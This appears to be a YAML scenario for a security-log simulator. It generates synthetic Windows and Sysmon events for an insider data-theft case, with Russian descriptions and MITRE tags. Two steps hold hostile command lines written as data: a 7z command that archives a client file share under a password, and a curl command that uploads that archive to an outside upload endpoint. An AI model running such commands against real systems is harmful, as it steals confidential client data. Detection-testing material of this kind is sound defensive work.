name: "Insider Threat / Data Exfiltration"
description: "Симуляция кражи данных инсайдером: архивация файлов с файлового сервера и выгрузка через веб-браузер/curl."
global_context:
  host.name: "PC-SELLER"
  host.domain: "{env.domain}"
  user.name: "seller"

steps:
  - id: "step_1_archive_data"
    template: "win_security_4688"
    description: "Архивация корпоративных данных с файлового сервера (FS01)."
    delay_from_prev: "0s"
    fields:
      host_name: "PC-SELLER"
      host_ip: "192.168.100.26"
      user_name: "seller"
      process_name: "7z.exe"
      process_path: "C:\\Program Files\\7-Zip\\7z.exe"
      parent_name: "explorer.exe"
      parent_path: "C:\\Windows\\explorer.exe"
      process_command_line: "7z.exe a -pSECRET C:\\Users\\seller\\Desktop\\clients_db.7z \\\\192.168.100.1\\Shared\\Clients\\*"
      mitre_technique: "T1560.001"
      mitre_tactic: "Collection"

  - id: "step_2_file_creation"
    template: "sysmon_event_11"
    description: "Запароленный архив создается на рабочем столе инсайдера."
    delay_from_prev: "30s"
    depends_on: "step_1_archive_data"
    fields:
      host_name: "PC-SELLER"
      host_ip: "192.168.100.26"
      user_name: "seller"
      file_name: "clients_db.7z"
      file_path: "C:\\Users\\seller\\Desktop\\clients_db.7z"
      mitre_technique: "T1560.001"
      mitre_tactic: "Collection"

  - id: "step_3_exfiltration_curl"
    template: "win_security_4688"
    description: "Выгрузка архива на внешний ресурс."
    delay_from_prev: "5m"
    depends_on: "step_2_file_creation"
    fields:
      host_name: "PC-SELLER"
      host_ip: "192.168.100.26"
      user_name: "seller"
      process_name: "curl.exe"
      process_path: "C:\\Windows\\System32\\curl.exe"
      parent_name: "cmd.exe"
      parent_path: "C:\\Windows\\System32\\cmd.exe"
      process_command_line: "curl.exe -F \"file=@C:\\Users\\seller\\Desktop\\clients_db.7z\" https://192.168.100.253/upload"
      mitre_technique: "T1048.003"
      mitre_tactic: "Exfiltration"
